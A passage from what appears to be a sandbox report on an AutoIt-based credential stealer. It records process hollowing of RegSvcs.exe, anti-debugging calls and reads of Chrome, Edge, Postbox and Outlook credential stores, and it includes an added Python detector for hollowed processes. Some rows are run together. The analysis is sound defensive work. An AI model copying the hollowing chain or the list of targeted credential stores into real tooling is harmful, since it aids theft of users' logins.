Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $]qEmultipart/form-data; boundary=------------------------8dd326c5f9c7285<
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000003.00000002.4527795907.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4527377722.00000000014E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000007.00000002.4532685097.0000000004382000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000007.00000002.4532685097.00000000046A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 3_2_066E9548 LdrInitializeThunk
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00323F09 BlockInput
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002E5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B4B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0116A7B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0116BE18 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0116BE78 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00F6E4F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00F6E490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_00F6CE30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 6_2_01B403A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 6_2_01B41A08 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 6_2_01B41A68 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_003080A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002DA124 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002DA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0004A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Code function: 2_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B11008
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11F0008
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_003087B1 LogonUserW
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002B48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00314C27 mouse_event
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
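In the process-creation rows above, RegSvcs.exe (a signed .NET Framework binary) is started with a command line that names a different executable, first 6BRa130JDj.exe and then ectosphere.exe. Taken together with the preceding "Section loaded ... protection: execute and read and write" and "Memory written ... RegSvcs.exe" rows, that is the pattern of a process started suspended and overwritten with another image. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses rows of this shape and flags every child whose image path and argv[0] disagree. The row grammar in `PROC_RE` is inferred from the report text and the basename comparison is the example's own heuristic; a benign launcher that passes another .exe path as its only argument would also trip it, so treat the flag as a lead to confirm against the memory-write rows, not a verdict. The sample rows are constructed from the three rows on this page.

```python
"""Flag process hollowing / command-line spoofing from 'Process created' rows.

Added example, not code from the Joe Sandbox report. Assumptions (labelled):
the row grammar in PROC_RE is inferred from the report's text; the rule that a
child whose image path and argv[0] name different executables was started
suspended and overwritten (hollowed) is this example's heuristic, and a benign
launcher that passes another .exe path as its only argument would trip it too.
"""
from __future__ import annotations

import ntpath
import re
from typing import Iterable

# Row shape: Source: <parent image>Process created: <child image> "<command line>"
PROC_RE = re.compile(
    r"Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*(?P<image>\S+?\.exe)\s*(?P<cmdline>.*)",
    re.IGNORECASE,
)

# Constructed sample: the three rows from the report, the last one left garbled
# exactly as the scraped page shows it (separators and link text run together).
SAMPLE_ROWS = [
    r'Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"',
    r'Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"',
    r'Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe" Jump to behavior',
]


def argv0(cmdline: str) -> str:
    """First token of a Windows command line, honouring double quotes."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def analyze(rows: Iterable[str]) -> list[dict]:
    """One finding per 'Process created' row; spoofed_cmdline is the hollowing flag."""
    findings = []
    for row in rows:
        m = PROC_RE.search(row)
        if not m:
            continue
        image = m.group("image")
        first = argv0(m.group("cmdline"))
        # A normally started process names its own image in argv[0]; a missing
        # command line is no evidence either way, so it is not flagged.
        spoofed = bool(first) and (
            ntpath.basename(image).lower() != ntpath.basename(first).lower()
        )
        findings.append({
            "parent": m.group("parent"),
            "image": image,
            "argv0": first,
            "spoofed_cmdline": spoofed,
        })
    return findings


def suspicious_chains(findings: list[dict]) -> list[str]:
    """Human-readable parent -> child lines for every flagged child."""
    return [
        f'{ntpath.basename(f["parent"])} -> {ntpath.basename(f["image"])} '
        f'(command line names {ntpath.basename(f["argv0"])})'
        for f in findings
        if f["spoofed_cmdline"]
    ]


if __name__ == "__main__":
    for line in suspicious_chains(analyze(SAMPLE_ROWS)):
        print(line)
```

On the rows above this yields two flagged chains, both ectosphere.exe -> RegSvcs.exe, and none for wscript.exe -> ectosphere.exe, whose command line names its own image. The same image-versus-argv[0] comparison can be run on live Sysmon or EDR process-creation events, where it is one of the cheaper ways to surface hollowed hosts.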
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_00307CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_0030874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: 6BRa130JDj.exe, ectosphere.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6BRa130JDj.exe, ectosphere.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\6BRa130JDj.exe | Code function: 0_2_002D862B cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002E4E87
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002F1E06 GetUserNameW,0_2_002F1E06
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002E3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_002E3F3A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_002B49A0
                Source: C:\Users\user\Desktop\6BRa130JDj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.4529175077.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4529357872.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4529357872.000000000346F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4529175077.0000000002D9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4526700849.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6148, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
